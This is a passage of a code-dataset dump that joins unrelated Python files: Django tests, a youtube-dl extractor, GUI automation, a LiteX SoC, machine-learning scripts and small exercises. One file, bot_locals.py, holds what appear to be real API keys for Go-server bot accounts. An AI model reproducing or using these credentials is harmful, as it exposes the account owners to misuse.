** 3)\n g2 = (1 + 4 * p + p ** 2 - 4 * ap * (1 + p) + (6 - 3 * ap) * ap * ap) / (ap * (1 - ap) ** 2)\n return (mu, var, g1, g2)\n def fit(self, distrib):\n (mu, var) = (distrib.mean(), distrib.var())\n pr_0 = 1. - mu / (mu * mu + var)\n def mle(pr, x):\n F = x * np.log(pr) - np.log(x) - np.log(-np.log(1. 
- pr))\n return - np.sum(F, axis=0)\n return optimize.fmin(mle, pr_0, args=(distrib.ravel(),), disp=0)\nlogseries = logseries_gen(a=1, name='logseries', shapes=\"pr\", extradoc=\"\"\"\n\nLog-series distribution\n\n logseries.pmf(k,p) = -1/log(1-p) * p**k / k\n for k in {1,...,n}\n\"\"\")\n\n\n\n\n\n","sub_path":"scikits/hydroclimpy/stats/extradistributions.py","file_name":"extradistributions.py","file_ext":"py","file_size_in_byte":20739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"569901903","text":"from sikuli import *\nimport logging\nimport myTools\n\n#---------------------------------------------------#\ndef fCreate_OneFundsTransfer(pClient,pCliNum,pMonth):\n#---------------------------------------------------#\n\n logging.debug('- Create_OneFundsTransfer: ' + str(pMonth) + \"-\" + pClient)\n\n # new transaction\n type(\"n\",KeyModifier.CTRL)\n myTools.waitForTransEntry()\n\n # switch to Transfer to Funds\n\n type(Key.UP) # this is to get by a UI defect\n time.sleep(1) \n type(\"t\")\n time.sleep(1)\n type(Key.DOWN)\n time.sleep(1) \n type(Key.TAB)\n \n # client\n myTools.enterClient(pClient)\n \n # date\n tranDate = str(pMonth) + \"/28/\" + Settings.dataYear\n type(tranDate)\n time.sleep(1)\n type(Key.TAB) \n \n # Amount\n type(Key.TAB)\n \n # Description\n type(\"a\",KeyModifier.CTRL)\n type(pClient + \" - \" + str(pCliNum) + \" - \" + tranDate)\n type(Key.ENTER)\n time.sleep(1)\n type(Key.TAB)\n\n # payment list - mark first item in list\n if (int(Settings.tsVersion) > 2016) and (Settings.tsDB == \"PREM\"):\n type(Key.SPACE) # in TS2017+ PREM, this marks the check box\n else: \n type(Key.DOWN) # in others, this movement highlights first in list\n \n time.sleep(1)\n type(Key.TAB)\n\n # funds account\n type(Key.END)\n time.sleep(1)\n\n type(\"s\",KeyModifier.CTRL)\n myTools.waitForTransSave() \n\n#---------------------------------------------------#\ndef fCreate_TransfersToFunds(pMonth):\n#---------------------------------------------------#\n\n myTools.sectionStartTimeStamp(\"transfer funds\" + str(pMonth))\n logging.debug('Create_TransfersFunds: ' + str(pMonth))\n\n allClients = [\"East.Brookfield\",\"North.Andover\",\"West.Bridgewater\"]\n count = 0\n\n myTools.getFocus()\n\n # open a/r tran list\n type(\"t\",KeyModifier.CTRL)\n myTools.waitForTransList()\n\n for oneClient in allClients:\n count += 1\n fCreate_OneFundsTransfer(oneClient,count,pMonth)\n\n type(Key.F4,KeyModifier.CTRL)\n time.sleep(1)\n type(Key.F4,KeyModifier.CTRL)\n \n myTools.sectionEndTimeStamp()\n myTools.checkProcesses()","sub_path":"trans_TransfersToFunds.sikuli/trans_TransfersToFunds.py","file_name":"trans_TransfersToFunds.py","file_ext":"py","file_size_in_byte":2191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"102426905","text":"# coding: utf-8\nfrom __future__ import unicode_literals\n\nfrom .common import InfoExtractor\nfrom ..utils import int_or_none\n\n\nclass TouTvIE(InfoExtractor):\n IE_NAME = 'tou.tv'\n _VALID_URL = r'https?://ici\\.tou\\.tv/(?P[a-zA-Z0-9_-]+/S[0-9]+E[0-9]+)'\n\n _TEST = {\n 'url': 'http://ici.tou.tv/garfield-tout-court/S2015E17',\n 'info_dict': {\n 'id': '122017',\n 'ext': 'mp4',\n 'title': 'Saison 2015 Épisode 17',\n 'description': 'La photo de famille 2',\n 'upload_date': '20100717',\n },\n 'params': {\n # m3u8 download\n 'skip_download': True,\n },\n }\n\n def _real_extract(self, url):\n path = self._match_id(url)\n metadata = 
self._download_json('http://ici.tou.tv/presentation/%s' % path, path)\n video_id = metadata['IdMedia']\n details = metadata['Details']\n title = details['OriginalTitle']\n\n return {\n '_type': 'url_transparent',\n 'url': 'radiocanada:%s:%s' % (metadata.get('AppCode', 'toutv'), video_id),\n 'id': video_id,\n 'title': title,\n 'thumbnail': details.get('ImageUrl'),\n 'duration': int_or_none(details.get('LengthInSeconds')),\n }\n","sub_path":"python/youtube-dl/2016/8/toutv.py","file_name":"toutv.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"10320446","text":"from pyorama.core.app import *\r\nfrom pyorama.graphics.window import *\r\nfrom pyorama.event.listener import *\r\nfrom pyorama.event.event_enums import *\r\n\r\nclass Game(App):\r\n \r\n def init(self):\r\n super().init()\r\n self.setup_window()\r\n \r\n def quit(self):\r\n super().quit()\r\n\r\n def setup_window(self):\r\n self.width = 800\r\n self.height = 600\r\n self.window = Window(self.graphics)\r\n print(\"window\")\r\n self.window.create(self.width, self.height, b\"BunnyMark\")\r\n self.window_listener = Listener(self.event)\r\n self.window_listener.create(EVENT_TYPE_WINDOW, self.on_window_event)\r\n print(\"done\")\r\n \r\n def on_window_event(self, event_data):\r\n print(\"on window event\")\r\n if event_data[\"sub_type\"] == WINDOW_EVENT_TYPE_CLOSE:\r\n self.quit()\r\n\r\nif __name__ == \"__main__\":\r\n game = Game()\r\n game.run()","sub_path":"examples/data_test.py","file_name":"data_test.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"649829545","text":"\n\"\"\"\nContact Form tests\n\"\"\"\nimport mock\n\nfrom django import test\nfrom django.core.urlresolvers import reverse\nfrom django.template import loader, TemplateDoesNotExist\n\nfrom contact_form import forms, views\n\n\n\nclass AcceptanceTestsContactCompletedPage(test.TestCase):\n\n def test_receives_200_status_code_for_completed_page(self):\n response = self.client.get(reverse(\"contact_form:completed\"))\n self.assertEqual(200, response.status_code)\n\n def test_uses_completed_template_when_rendering_page(self):\n response = self.client.get(reverse(\"contact_form:completed\"))\n self.assertTemplateUsed(response, views.CompletedPage.template_name)\n\n\nclass BaseEmailFormMixinTests(test.TestCase):\n\n @mock.patch('django.template.loader.render_to_string')\n def test_get_message_returns_rendered_message_template(self, render_to_string):\n context = {'message': 'an example message.'}\n\n class TestForm(forms.BaseEmailFormMixin):\n message_template_name = \"my_template.html\"\n def get_context(self):\n return context\n\n form = TestForm()\n\n message = form.get_message()\n self.assertEqual(render_to_string.return_value, message)\n render_to_string.assert_called_once_with(form.message_template_name, context)\n\n @mock.patch('django.template.loader.render_to_string')\n def test_get_subject_returns_single_line_rendered_subject_template(self, render_to_string):\n render_to_string.return_value = 'This is \\na \\ntemplate.'\n context = {'message': 'an example message.'}\n\n class TestForm(forms.BaseEmailFormMixin):\n subject_template_name = \"my_template.html\"\n def get_context(self):\n return context\n\n form = TestForm()\n\n subject = form.get_subject()\n self.assertEqual('This is a template.', subject)\n 
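# get_subject() must collapse the rendered template to a single line: email Subject headers cannot contain newlines\n 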
render_to_string.assert_called_once_with(form.subject_template_name, context)\n\n def test_get_context_returns_cleaned_data_when_form_is_valid(self):\n class TestForm(forms.BaseEmailFormMixin, forms.forms.Form):\n name = forms.forms.CharField()\n\n form = TestForm(data={'name': 'test'})\n self.assertEqual(dict(name='test'), form.get_context())\n\n def test_get_context_returns_value_error_when_form_is_invalid(self):\n class TestForm(forms.BaseEmailFormMixin, forms.forms.Form):\n name = forms.forms.CharField()\n\n form = TestForm(data={})\n with self.assertRaises(ValueError) as ctx:\n form.get_context()\n self.assertEqual(\"Cannot generate Context when form is invalid.\", ctx.exception.message)\n\n @mock.patch(\"contact_form.forms.EmailMessage\")\n @mock.patch(\"contact_form.forms.BaseEmailFormMixin.get_message_dict\")\n def test_sends_mail_with_message_dict(self, get_message_dict, email_class):\n mock_request = test.RequestFactory().get('/')\n get_message_dict.return_value = {\"name\": \"aaron\"}\n\n form = forms.BaseEmailFormMixin()\n form.send_email(mock_request)\n\n email_class.assert_called_once_with(**get_message_dict.return_value)\n email_class.return_value.send.assert_called_once_with(fail_silently=False)\n\n @mock.patch(\"contact_form.forms.BaseEmailFormMixin.get_subject\")\n @mock.patch(\"contact_form.forms.BaseEmailFormMixin.get_message\")\n def test_gets_message_dict(self, get_message, get_subject):\n form = forms.BaseEmailFormMixin()\n message_dict = form.get_message_dict()\n\n self.assertEqual({\n \"from_email\": form.from_email,\n \"to\": form.recipient_list,\n \"body\": get_message.return_value,\n \"subject\": get_subject.return_value,\n }, message_dict)\n\n\nclass ContactFormTests(test.TestCase):\n\n def test_is_subclass_of_form_and_base_contact_form_mixin(self):\n self.assertTrue(issubclass(forms.ContactForm, forms.BaseEmailFormMixin))\n self.assertTrue(issubclass(forms.ContactForm, forms.forms.Form))\n\n def test_has_valid_subject_template(self):\n template_exists = 1\n try:\n loader.render_to_string(forms.ContactForm.subject_template_name)\n except TemplateDoesNotExist:\n template_exists = 0\n self.assertTrue(template_exists, \"Subject template does not exist\")\n\n def test_has_valid_message_template(self):\n template_exists = 1\n try:\n loader.render_to_string(forms.ContactForm.message_template_name)\n except TemplateDoesNotExist:\n template_exists = 0\n self.assertTrue(template_exists, \"Email message template does not exist\")\n\n\nclass ContactModelFormTests(test.TestCase):\n\n def test_is_subclass_of_model_form_and_base_contact_form_mixin(self):\n self.assertTrue(issubclass(forms.ContactModelForm, forms.BaseEmailFormMixin))\n self.assertTrue(issubclass(forms.ContactModelForm, forms.forms.ModelForm))\n\n def test_has_valid_subject_template(self):\n template_exists = 1\n try:\n loader.render_to_string(forms.ContactModelForm.subject_template_name)\n except TemplateDoesNotExist:\n template_exists = 0\n self.assertTrue(template_exists, \"Subject template does not exist\")\n\n def test_has_valid_message_template(self):\n template_exists = 1\n try:\n loader.render_to_string(forms.ContactModelForm.message_template_name)\n except TemplateDoesNotExist:\n template_exists = 0\n self.assertTrue(template_exists, \"Email message template does not exist\")\n","sub_path":"contact_form/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":5550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"644388744","text":"def 
interpolation_search(arr, x):\n low = 0\n high = len(arr) - 1\n while low <= high and x >= arr[low] and x <= arr[high]:\n if low == high:\n if arr[low] == x:\n return low\n return -1\n pos = low + int(((float(high - low) / (arr[high] - arr[low])) * (x - arr[low])))\n if arr[pos] == x:\n return pos\n if arr[pos] < x:\n low = pos + 1\n else:\n high = pos - 1\n return -1\n\n\nif __name__ == '__main__':\n # interpolation search requires a sorted array\n arr = [5, 6, 7, 11, 12, 13]\n x = 11\n result = interpolation_search(arr, x)\n if result != -1:\n print(\"Element is present at index\", str(result))\n else:\n print(\"Element is not present in array\")\n","sub_path":"Python/InterpolationSearch.py","file_name":"InterpolationSearch.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"530435039","text":"from plynx.constants import Collections\nfrom plynx.db.db_object import DBObject, DBObjectField\nfrom plynx.db.node import Node\nfrom plynx.utils.db_connector import get_db_connector\nfrom plynx.utils.common import ObjectId\n\n\nclass WorkerState(DBObject):\n \"\"\"Status of the worker\"\"\"\n FIELDS = {\n '_id': DBObjectField(\n type=ObjectId,\n default=ObjectId,\n is_list=False,\n ),\n 'worker_id': DBObjectField(\n type=str,\n default=None,\n is_list=False,\n ),\n 'graph_id': DBObjectField(\n type=ObjectId,\n default=None,\n is_list=False,\n ),\n 'node': DBObjectField(\n type=Node,\n default=None,\n is_list=False,\n ),\n 'host': DBObjectField(\n type=str,\n default='',\n is_list=False,\n ),\n 'num_finished_jobs': DBObjectField(\n type=int,\n default=0,\n is_list=False,\n ),\n }\n\n\nclass MasterState(DBObject):\n \"\"\"Master statistics snapshot.\"\"\"\n\n FIELDS = {\n '_id': DBObjectField(\n type=ObjectId,\n default=ObjectId,\n is_list=False,\n ),\n 'workers': DBObjectField(\n type=WorkerState,\n default=list,\n is_list=True,\n ),\n }\n\n DB_COLLECTION = Collections.MASTER_STATE\n\n\ndef get_master_state():\n states = getattr(get_db_connector(), MasterState.DB_COLLECTION)\\\n .find({}).sort('insertion_date', -1).limit(1)\n return states[0] if states.count() > 0 else None\n","sub_path":"plynx/db/service_state.py","file_name":"service_state.py","file_ext":"py","file_size_in_byte":1662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"471702446","text":"from os.path import abspath, join, dirname\r\nfrom random import random\r\n\r\n\r\ndef file_path(name: str, prefix=\"\"):\r\n if prefix:\r\n return abspath(join(dirname(__file__), 'data', prefix, name))\r\n return abspath(join(dirname(__file__), 'data', name))\r\n\r\n\r\ndef shrink_file(name: str, factor=100):\r\n if factor <= 1 or type(factor) != int:\r\n raise ValueError(\"factor must be greater than 1 and be an integer\")\r\n\r\n if '.' in name and '/' in name:\r\n folder, file = name.split('/')\r\n file, ext = file.split('.')\r\n new_name = '%s/%s.%s' % (folder, file + '-s', ext)\r\n elif '.' 
in name:\r\n file, ext = name.split('.')\r\n new_name = '%s.%s' % (file + '-s', ext)\r\n elif '/' in name:\r\n folder, file = name.split('/')\r\n new_name = '%s/%s' % (folder, file + '-s')\r\n else:\r\n new_name = name + '-s'\r\n\r\n with open(file_path(name)) as inp, open(file_path(new_name), 'w+') as out:\r\n\r\n print(\"Shrinking file\")\r\n for line in inp:\r\n if random() < 1 / factor:\r\n out.write(line)\r\n\r\n print(\"Done\")\r\n\r\n\r\nif __name__ == '__main__':\r\n shrink_file('audioscrobbler/user_artist_data', 500)\r\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"227874846","text":"class Solution:\n def minPathSum(self, grid):\n rows, cols = len(grid), len(grid[0])\n dp = [0] * cols\n for i in range(rows):\n dp[0] += grid[i][0]\n for j in range(1, cols):\n dp[j] = (dp[j - 1] if i == 0 else min(dp[j], dp[j - 1])) + grid[i][j]\n\n return dp[cols - 1]\n\nsol = Solution()\nassert sol.minPathSum([[1, 3, 1], [1, 5, 1], [4, 2, 1]]) == 7\n","sub_path":"competitiveprogramming-python/src/com/mounacheikhna/leetcode/medium/64. Minimum Path Sum.py","file_name":"64. Minimum Path Sum.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"159626474","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('registerFamily', views.register_family),\n path('login', views.login),\n path('addUpdateUser', views.update_user),\n path('getUserList', views.get_user_list),\n path('getGeofenceList', views.get_geofence_list),\n path('getHistoryList', views.get_history_list),\n path('getLastKnownList', views.get_last_known_list),\n path('addUpdateGeofence', views.update_geofence),\n path('uploadLocation', views.upload_location),\n path('uploadGeofence', views.upload_geofence)\n]","sub_path":"project/app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"329646153","text":"gtp2ogs_standard_args = {'ggshost':\"ggs.online-go.com\",\n 'resthost':\"online-go.com\"}\n\nBilly = {'apikey':\"cbc2817b88c24a2bb777a0a80e29cd5b937eaa38\",\n 'botid':\"Billy (GnuGo lvl10)\",\n 'command':'gnugo',\n 'command-args':['--mode', 'gtp']}\n\nJiffy = {'apikey':'e85a77fb0a7f7a927c881156229b1ff95feebb3b',\n 'botid':\"Jiffy (Pachi)\", \n 'command':'pachi',\n 'command-args':['-f', '/home/crodgers/fuego-1.1/book.dat', 'max_tree_size=512']}\n\nNatsu = {'apikey':'afa24b7b2153bc0d4f98ae6092b8726b4dc246ee',\n 'botid':\"Natsu (Fuego)\",\n 'command':'fuego',\n 'command-args':[]}\n\nGruffy = {'apikey':\"68504661564f2f67a7799a2dcdcddb35a6b02b69\",\n 'botid':\"TheKid (GnuGo)\",\n 'command':'/home/crodgers/oldGNUGO/gnugo-3.4/interface/gnugo',\n 'command-args':['--mode', 'gtp', '--level', '1']}\n\nNanny = {'apikey':\"e2310a7162033047b15a2b57247b24368633eed6\",\n 'botid':\"Nanny (GnuGo lvl5)\",\n 'command':'gnugo',\n 'command-args':['--mode', 'gtp', '--level', '1']}\n\nbots = (Billy, Jiffy, Natsu)\n","sub_path":"bot_locals.py","file_name":"bot_locals.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"421533860","text":"#!/usr/bin/env python3\n\nimport os\n\nfrom migen import *\n\nfrom litex.soc.interconnect import wishbone\nfrom litex.soc.integration.soc_core import 
mem_decoder\n\nfrom litex.soc.cores.spi_flash import SpiFlash\n\nfrom periphs.misc import *\nfrom periphs.accel import *\n\n# SoCAE4GX -----------------------------------------------------------------------------------------\n\ndef SoCAE4GX(soc_cls, **kwargs):\n class _SoCLinux(soc_cls):\n soc_cls.csr_map.update({\n \"ctrl\": 0,\n \"uart\": 2,\n \"timer0\": 3,\n })\n soc_cls.interrupt_map.update({\n \"uart\": 3,\n \"timer0\": 4,\n })\n soc_cls.mem_map = {\n \"rom\": 0x00000000,\n \"sram\": 0x10000000,\n \"csr\": 0xf0000000,\n }\n\n def __init__(self, **kwargs):\n soc_cls.__init__(self, cpu_type=\"vexriscv\", cpu_variant=\"lite\", **kwargs)\n\n # Integrate SPI master\n self.submodules.spi_master = spi_master = SpiMaster(self.platform.request(\"spi\", 0))\n self.add_csr(\"spi_master\", 10, allow_user_defined=True)\n self.add_interrupt(\"spi_master\", 6, allow_user_defined=True)\n self.register_mem(\"spi_master\", 0x30000000, spi_master.bus, 32)\n spi_master.add_source(self.platform)\n\n # Custom accel simulator IP core\n self.submodules.accel = accel = AccelCore(freq=100000000, baud=115200, pads=self.platform.request(\"spi_slave\", 0))\n self.add_csr(\"accel\", 11, allow_user_defined=True)\n self.add_interrupt(\"accel\", 7, allow_user_defined=True)\n\n return _SoCLinux(**kwargs)\n","sub_path":"soc_ae4gx.py","file_name":"soc_ae4gx.py","file_ext":"py","file_size_in_byte":1682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"137196269","text":"\n\n\n\n\n\nimport numpy as np\nfrom sklearn.preprocessing import StandardScaler\n\nimport csv \nimport re \nimport os \n\n\nimport matchzoo as mz\nprint(mz.__version__)\n\ntask = mz.tasks.Ranking()\nprint(task)\n\n\nimport pandas as pd\nbdf=pd.read_csv('example.csv') #This will be predefined in the user input any csv\n\n\n\ndef inputs(bdf,i):\n s=(bdf.iloc[i]['ttxt'])\n fs= open(\"temp.txt\",\"w+\")\n fs.write(s)\n fs=open('temp.txt',\"r+\")\n rd=fs.read()\n cleaned=clean(rd)\n return cleaned\n #text_file = open(\"sample.txt\", \"wt\")\n #n = text_file.write(s)\n\n\n\ndef clean(btxt): \n import re, string\n #txt= open(\"uH3h7NAk.txt\", \"r+\")\n #txt= open(fname, \"r+\")\n #txt=txt.read()#Reading\n txt=btxt\n print(txt)\n txt=str(txt.encode(encoding = 'UTF-8',errors = 'strict')) #UTF-8 Encoding\n clean = re.sub(r\"[0-9,.;@#?/&%\"\",(),[],!&$]+\\ *\", \" \", txt.replace('b','')) #Removes unncessary stuff for word vectors\n print(clean)\n s=clean\n exclude = set(string.punctuation)\n table = str.maketrans(\"\",\"\")\n regex = re.compile('[%s]' % re.escape(string.punctuation)) #Punctuations\n text= regex.sub('', s)\n import nltk\n #nltk.download('stopwords')\n from nltk.corpus import stopwords #Stop Words influencing the game\n cachedStopWords = stopwords.words(\"english\")\n text = ' '.join([word for word in text.split() if word not in cachedStopWords]).lower()\n return text\n\n\n#Sends the dataframe here and parses for each documnet contained in iloc[0,1,2....n]\nfor i in range(len(bdf)):\n res=inputs(bdf,i)\n print(res)\n\n\n\n\n\n\n\ntrain_raw = mz.datasets.toy.load_data(stage='train', task=task)\ntest_raw = mz.datasets.toy.load_data(stage='test', task=task)\n\n\ntype(train_raw)\n\ntrain_raw.left.head()\n\ntrain_raw.right.head()\n\ntrain_raw.relation.head()\n\ntrain_raw.frame().head()\n\npreprocessor = mz.preprocessors.BasicPreprocessor()\n\npreprocessor.fit(train_raw)\n\npreprocessor.context\n\n\ntrain_processed = preprocessor.transform(train_raw)\ntest_processed = 
preprocessor.transform(test_raw)\n\n\ntrain_processed.left.head()\n\n\n\nvocab_unit = preprocessor.context['vocab_unit']\nprint('Orig Text:', train_processed.left.loc['Q1']['text_left'])\nsequence = train_processed.left.loc['Q1']['text_left']\nprint('Transformed Indices:', sequence)\nprint('Transformed Indices Meaning:',\n '_'.join([vocab_unit.state['index_term'][i] for i in sequence]))\n\n\n\nmz.models.list_available()\n\n\nmodel =mz.models.DenseBaseline()\n\n\nmodel.params['mlp_num_layers'] =3\nmodel.params['mlp_num_units'] = 300\nmodel.params['mlp_num_fan_out'] = 128\nmodel.params['mlp_activation_func'] = 'relu'\nmodel.guess_and_fill_missing_params(verbose=0)\n \n\n\nprint(model.params)\n\nmodel.params.to_frame()[['Name', 'Description', 'Value']]\n\nmodel.params['task'] = task\nmodel.params['mlp_num_units'] = 5\nprint(model.params)\n\n\nmodel.params.update(preprocessor.context)\n\n\n\nmodel.params.completed()\n\n\n\nmodel.build()\nmodel.compile()\n\n\nmodel.backend.summary()\n\n\n\n\nx, y = train_processed.unpack()\ntest_x, test_y = test_processed.unpack()\n\nmodel.fit(x, y, batch_size=32, epochs=800)\n\n\n\ndata_generator = mz.DataGenerator(train_processed, batch_size=32)\n\n\nmodel.fit_generator(data_generator, epochs=5, use_multiprocessing=True, workers=4)\n\n\n\n\n\nmodel.evaluate(test_x, test_y)\n\nmodel.predict(test_x)\n\n\nprint(np.array(test_x))\n\n\nscaler = StandardScaler()\nprint(scaler.fit(test_x))\n\n\nmodel.save('my-model')\n","sub_path":"DSSM/test_runs/run_tests1.py","file_name":"run_tests1.py","file_ext":"py","file_size_in_byte":3342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"39513085","text":"#!/usr/bin/env python\n#\n# Copyright 2012, Rackspace US, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\nimport flask\n\nfrom opencenter.db.api import api_from_models\nfrom opencenter.db import exceptions\nfrom opencenter.webapp import generic\n# from opencenter.webapp import solver\n# from opencenter.webapp import utility\n\n\nobject_type = 'adventures'\nbp = flask.Blueprint(object_type, __name__)\n\n\n@bp.route('/', methods=['GET', 'POST'])\ndef list():\n return generic.list(object_type)\n\n\n@bp.route('/', methods=['GET', 'PUT', 'DELETE'])\ndef by_id(object_id):\n return generic.object_by_id(object_type, object_id)\n\n\n@bp.route('//execute', methods=['POST'])\ndef execute_adventure(adventure_id):\n data = flask.request.json\n\n if not 'node' in data:\n return generic.http_badrequest(msg='node not specified')\n\n api = api_from_models()\n try:\n adventure = api._model_get_by_id('adventures', int(adventure_id))\n except exceptions.IdNotFound:\n message = 'Not Found: Adventure %s' % adventure_id\n return generic.http_notfound(msg=message)\n\n try:\n return generic.http_solver_request(data['node'], [],\n api=api, plan=adventure['dsl'])\n except exceptions.IdNotFound:\n #Can IdNotFound be raised for any other reason?\n return generic.http_notfound(msg='Not Found: Node %s' % 
data['node'])\n","sub_path":"opencenter/webapp/adventures.py","file_name":"adventures.py","file_ext":"py","file_size_in_byte":1914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"363697243","text":"from django.db import models\n\n\nARTICLE_CATEGORY_CHOICE = (\n (1, \"Story\"),\n (2, \"Course\"),\n (3, \"Learning Resources\")\n)\n\n\nclass Article(models.Model):\n title = models.TextField(blank=False, default=\"Article\")\n category = models.SmallIntegerField(\n default=1, choices=ARTICLE_CATEGORY_CHOICE)\n content = models.TextField(blank=True, default=\"Article\")\n img = models.URLField(\n blank=False, default=\"https://i.imgur.com/67A5cyq.jpg\")\n url = models.URLField(\n blank=False, default=\"https://i.imgur.com/67A5cyq.jpg\")\n","sub_path":"IMnight/sky/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"99148790","text":"# 1.\n# Write a program that swaps the keys and values in a dictionary.\nd = {1: \"one\", 2: \"two\"}\n# dictionaries are created as {key: value, }\n# append an element to a dictionary with\n# dictionary[key]=value\nd_new={}\nprint(len(d_new))\nfor k,v in d.items():\n d_new[v]=k\nprint(d_new)\n\n\n\n\n#\n# 2.\n# Can a tuple always be used as a dictionary key?\n# A tuple can be a dictionary key only when all of its elements are immutable;\n# if it contains a mutable type, it cannot be used as a key.\nt=(1,2,3)\n# t=(1,2,3,[4])\nx={t:\"dddd\"}\nprint(x,type(x))\n\n#\n#\n# 3.\n# Given the list list = [1, 2, 5, 4, 1, 5, 6, 8, 0, 2],\n# remove the duplicate elements,\n# in two ways: with set and without set\nlist1 = [1, 2, 5, 4, 1, 5, 6, 8, 0, 2]\nprint(list1)\nprint(list(set(list1)))\n# list1.sort(key=)\ntemp=[]\nfor x in list1:\n if x not in temp:\n temp.append(x)\nprint(temp)\n#\n# 4.\n# A dictionary stores student grades.\n# To order the dictionary's elements, the convention is to convert each element\n# into a (key,value) tuple, turning the whole dictionary into a list;\n# the final result should still be stored as tuples.\n\n# {\"tom\": 100, \"kate\": 90, \"jerry\": 95}: sort by student name and by grade, respectively\nd={\"tom\": 100, \"kate\": 90, \"jerry\": 95, \"lily\": 95}\nprint(sorted(d))\nt1=[]\nt2=[]\nfor k,v in d.items():\n # t1+=((k,v))\n t1.append((k,v))\n t2.append((v,k))\nprint(t1)\nprint(('jerry', 95)<('tom', 100))\nt1.sort()\nprint(tuple(t1))\nt2.sort()\nprint(t2)\n\n","sub_path":"python1808/day9/day8homework.py","file_name":"day8homework.py","file_ext":"py","file_size_in_byte":1383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"326515044","text":"import os\n\nf = open(\"day1input.txt\")\nvalues =[]\nfor value in f:\n values.append(int(value))\n \ntotal = 0\nPastTotals=[]\nflag = False\n\nwhile flag == False:\n for value in values:\n total += value\n if total in PastTotals:\n print(total)\n flag = True\n else:\n PastTotals.append(total)\n \n\n\n\n ","sub_path":"day1.py","file_name":"day1.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"261406473","text":"import os\nimport time\nimport copy\nimport torch\nimport argparse\nimport torch.utils.data as data\nfrom torch import (nn,optim,autograd,cuda)\nfrom torchvision import datasets,models,transforms\n\n\ndef get_args():\n\n parser = argparse.ArgumentParser(description='test_some_ex')\n parser.add_argument('--load',type=bool,default=False)\n parser.add_argument('--epochs',type=int,default=32,help='amount of epochs')\n parser.add_argument('--batch_size',type=int,default=64,help='amount of batch size')\n parser.add_argument('--cuda',type=int,default=0,help='cuda device ID')\n parser.add_argument('--lr',type=float,default=.001,help='learning rate')\n parser.add_argument('--momentum',type=float,default=.09,help='momentum')\n 
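# note: --weight_decay is parsed here but never forwarded to the optimizer below\n 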
parser.add_argument('--weight_decay',type=float,default=0.1,help='weight_decay')\n parser.print_help()\n args = parser.parse_args()\n return args\n\nargs = get_args()\nprint(f'epochs : {args.epochs}\\n'\n f'batch_size : {args.batch_size}\\n'\n f'lr : {args.lr}\\n')\n\ntorch.cuda.set_device(args.cuda)\n\ndata_DIR = 'damage_car_data'\nweight = \"CDD_model.pth\"\nweight_x2 = \"CDD_model_x2.pth\"\n\n# data_DIR = 'Damage-Car-Data-small'\ndata_trans = {\n 'train_set' : transforms.Compose([\n transforms.RandomResizedCrop(224),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n]),\n 'valid_set' : transforms.Compose([\n transforms.Resize(256),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n])}\n\ntest_trans = {'test_set' : transforms.Compose([\n transforms.Resize(256),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n])}\ncar_datasets = { x : datasets.ImageFolder(os.path.join(data_DIR,x),data_trans[x])\n for x in data_trans.keys()}\ndata_loaders = {x : data.DataLoader(dataset=car_datasets[x],batch_size=args.batch_size,shuffle=True,num_workers=4)\n for x in data_trans.keys()}\n\nphase = 'test_set'\ntest_dataset = {phase : datasets.ImageFolder(os.path.join(data_DIR, phase), test_trans[phase])}\ntest_loader = {phase : data.DataLoader(dataset=test_dataset[phase],\n batch_size=args.batch_size,\n shuffle=True, num_workers=4)}\ntest_data_size = len(test_dataset[phase])\n\n\ndata_sizes = {x : len(car_datasets[x]) for x in data_trans.keys()}\n\nclass_names = car_datasets['train_set'].classes\n\nprint(f'data_sizes {data_sizes}'\n f'names : {class_names}')\n\nmodel_ft = 